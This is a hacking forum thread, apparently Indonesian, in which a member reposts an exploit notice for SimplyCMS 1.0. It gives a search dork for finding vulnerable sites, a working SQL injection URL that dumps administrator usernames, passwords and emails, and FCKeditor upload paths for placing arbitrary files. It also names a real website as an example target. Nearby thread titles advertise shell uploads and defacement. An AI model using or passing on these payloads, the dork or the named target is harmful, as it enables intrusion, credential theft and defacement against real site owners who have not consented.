Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 05-19-2013, 04:45 AM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Hacking › Web Hacking v
« Previous 1 ... 9 10 11 12 13 ... 54 Next »

SimplyCMS 1.0 SqlI/Arbitrary File Upload Vulnerabilties

Home General Computer Multimedia Business Lounge

Post Reply 
Tweet
Threaded Mode | Linear Mode
SimplyCMS 1.0 SqlI/Arbitrary File Upload Vulnerabilties
05-26-2012, 10:38 PM
Post: #1
katob al mubarrak Offline
./Devilz Officer
Posts: 64
Joined: Mar 2012
Reputation: 2
SimplyCMS 1.0 SqlI/Arbitrary File Upload Vulnerabilties
tadi ane habis jalan,, ini hasilnyabelajar suramsuram

Code:
SimplyCMS 1.0  Sql Injection/Arbitrary File Upload Vulnerabilties
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.dsthosting.com/
.:. Drok           : inurl:"index.php?subid=" "Powered by DST - SimplyCMS"
.:. Gr34T$ T0 [aboud-el]
####################################################################

===[ Exploit ]===

Sql Injection
==============

http://SITE/index.php?subid=7[sql]

http://SITE/index.php?subid=7'+and+1=2+union+select+group_concat(ct,0x3a,username,0x3a,adminpass,0x3a,adminemail)+from+adminconf-- -

WEBSITE LOGIN: http://SITE/cms/index.php

Multiple Arbitrary File Upload
===============================

http://SITE/cms/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php << untuk upload file bertipe gambar
http://SITE/cms/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php << untuk upload file bertipe documents

http://SITE/cms/FCKeditor/editor/filemanager/browser/default/connectors/test.html
http://SITE/cms/FCKeditor/editor/filemanager/upload/test.html
http://SITE/cms/FCKeditor/editor/filemanager/browser/default/frmupload.html

Your File:

http://SITE/cms/myFiles/Image/ << untuk melihat isi file gambar
http://SITE/cms/myFiles/File/  << untuk melihat isi file documents

contoh site ada bugsnya :
http://www.mypinnacle.com.sg/cms/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

di atas sudah ane edit-edit semoga aja tidak di marahin sama autors orinya berdoa
refrence : http://www.1337day.com/exploits/18358
Visit this user's website Find all posts by this user
Quote this message in a reply
05-27-2012, 01:24 AM
Post: #2
Bunga.Mataharry Away
Someone who cares
***
Posts: 1,371
Joined: Jan 2011
Reputation: 89
RE: SimplyCMS 1.0 SqlI/Arbitrary File Upload Vulnerabilties
belajarbelajarbelajarbelajar
Visit this user's website Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  [Tutor] Hunting Windows Server+Upload Shell Via phpmyadmin using Computer Search Engine tey 17 654 Today 03:07 AM
Last Post: sarnobroken
Bug [Tutor] Local File Inclusion http://www.mojokertokota.go.id/ KotoM 34 1,804 05-12-2013 08:13 PM
Last Post: jihad_irhaby
  [Ask] Tentang Sqli nih? FebriNewbie 10 142 05-10-2013 02:00 PM
Last Post: uzumady
  Tools SQLi itzmeamar 16 282 05-04-2013 07:35 AM
Last Post: jundulloh
  [Tutor] mudahnya mencari file sensitif pada website w0rmil_alazka 18 1,272 04-25-2013 10:57 AM
Last Post: kid_1412
  SQLI Hunter v1.1 mpratz 5 169 04-20-2013 10:38 PM
Last Post: mpratz
  [Tutor] Upload shell image via tamper data test 25 841 04-18-2013 04:45 PM
Last Post: NvC User
  [Tutor] Deface website with SPAW Upload Vuln castro 31 2,499 03-25-2013 10:02 AM
Last Post: lanionk
Question [Tutor] Live [SQLi] + Reset Password Joomla momodrock 24 534 03-25-2013 09:51 AM
Last Post: lanionk
  Post SQLi Disini, sambil Belajar Kimmonosz 269 13,144 03-19-2013 05:07 PM
Last Post: facl3ss

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 05-19-2013, 04:45 AM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE